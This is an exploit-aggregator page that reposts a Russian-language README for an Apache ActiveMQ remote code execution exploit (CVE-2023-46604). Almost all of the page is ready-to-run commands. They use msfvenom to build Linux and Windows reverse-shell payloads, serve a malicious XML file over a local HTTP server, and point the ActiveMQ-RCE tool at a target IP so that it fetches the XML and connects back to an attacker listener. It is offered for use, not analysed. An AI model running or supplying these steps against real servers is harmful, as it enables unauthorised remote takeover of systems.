Sploitus

Exploit for CVE-2023-46604-RCE-Reverse-Shell-Apache-ActiveMQ

kitploit · 2026-08-30

Exploit Code

MARKDOWN31 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-SAUMYAJEETDAS-CVE-2023-46604-RCE-REVERSE-SHELL-APACHE-ACTIVEMQ
# CVE-2023-46604-RCE-Reverse-Shell-Apache-ActiveMQ

Этот эксплойт основан на фундаментальной работе, доступной по адресу https://github.com/X1cT34m (https://github.com/X1r0z/ActiveMQ-RCE). Мы дополнительно развили технику для получения обратной оболочки с использованием Metasploit Framework (https://github.com/rapid7/metasploit-framework).

# Использование:

**Важно: Вручную измените IP-адрес (0.0.0.0 в строке 11) в XML-файлах на IP-адрес, на котором будет сгенерирована полезная нагрузка. Если вы выполните приведенные ниже команды, это будет ваш IP-адрес слушателя. Также {IP_Of_Hosted_XML_File} будет вашим IP-адресом слушателя.**

Для целей Linux/Unix

root@kitploit:~
    
    
    git clone https://github.com/SaumyajeetDas/CVE-2023-46604-RCE-Reverse-Shell
    cd CVE-2023-46604-RCE-Reverse-Shell
    msfvenom -p linux/x64/shell_reverse_tcp LHOST={Your_Listener_IP/Host} LPORT={Your_Listener_Port} -f elf -o test.elf
    python3 -m http.server 8001
    ./ActiveMQ-RCE -i {Target_IP} -u http://{IP_Of_Hosted_XML_File}:8001/poc-linux.xml
    

Для целей Windows

root@kitploit:~
    
    
    git clone https://github.com/SaumyajeetDas/CVE-2023-46604-RCE-Reverse-Shell
    cd CVE-2023-46604-RCE-Reverse-Shell
    msfvenom -p windows/x64/shell_reverse_tcp LHOST={Your_Listener_IP/Host} LPORT={Your_Listener_Port} -f eXE -o test.exe
    python3 -m http.server 8001
    ./ActiveMQ-RCE -i {Target_IP} -u http://{IP_Of_Hosted_XML_File}:8001/poc-windows.xml